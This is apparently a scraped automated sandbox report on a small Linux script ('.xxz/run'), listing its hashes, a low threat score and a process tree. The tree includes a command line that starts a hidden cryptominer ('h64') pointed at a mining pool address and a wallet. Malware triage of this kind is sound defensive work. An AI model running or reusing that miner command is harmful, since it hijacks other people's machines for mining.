Overview

overview

10

Static

static

7

.xxz/h32

ubuntu-20.04-amd64

.xxz/h64

ubuntu-20.04-amd64

1

.xxz/md

ubuntu-20.04-amd64

10

.xxz/run

ubuntu-18.04-amd64

3

.xxz/run

debian-9-armhf

1

.xxz/run

debian-9-mips

.xxz/run

debian-9-mipsel

Analysis

  • max time kernel
    0s
  • max time network
    128s
  • platform
    ubuntu-18.04_amd64
  • resource
    ubuntu1804-amd64-20240508-en
  • resource tags

    arch:amd64arch:i386image:ubuntu1804-amd64-20240508-enkernel:4.15.0-213-genericlocale:en-usos:ubuntu-18.04-amd64system
  • submitted
    18-05-2024 02:29

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    .xxz/run

  • Size

    495B

  • MD5

    dfc728a7c269d566af9049b916fb7289

  • SHA1

    2f6b58bb8e2f3a84841c278922aff076ef1c191d

  • SHA256

    77ad3f8ab8742bcbe204136eb2c49f435d582be9c5a05287b527944f33549a28

  • SHA512

    6c05f0bb3122bdd22eae397f6b1788f4eabc28dec94818c83f4da90763a967af9c4891dc04f6cfd2732b85e2d82dda1817476aadcab1ddabed6a4321844665e6

Score
3/10

Malware Config

Signatures

  • Writes file to tmp directory 1 IoCs

    Malware often drops required files in the /tmp directory.

Processes

  • /tmp/.xxz/run
    /tmp/.xxz/run
    1⤵
    • Writes file to tmp directory
    PID:1491
    • /usr/bin/nproc
      nproc
      2⤵
        PID:1492
      • /bin/uname
        uname -m
        2⤵
          PID:1493
      • /tmp/.xxz/h64
        ./h64 -s xxxdz ./md -o 107.191.99.95:3333 -u 46E9UkTFqALXNh2mSbA7WGDoa2i6h4WVgUgPVdT9ZdtweLRvAhWmbvuY1dhEmfjHbsavKXo3eGf5ZRb4qJzFXLVHGYH4moQ -p x -B
        1⤵
          PID:1494

        Network

        MITRE ATT&CK Matrix

        Replay Monitor

        Loading Replay Monitor...

        Downloads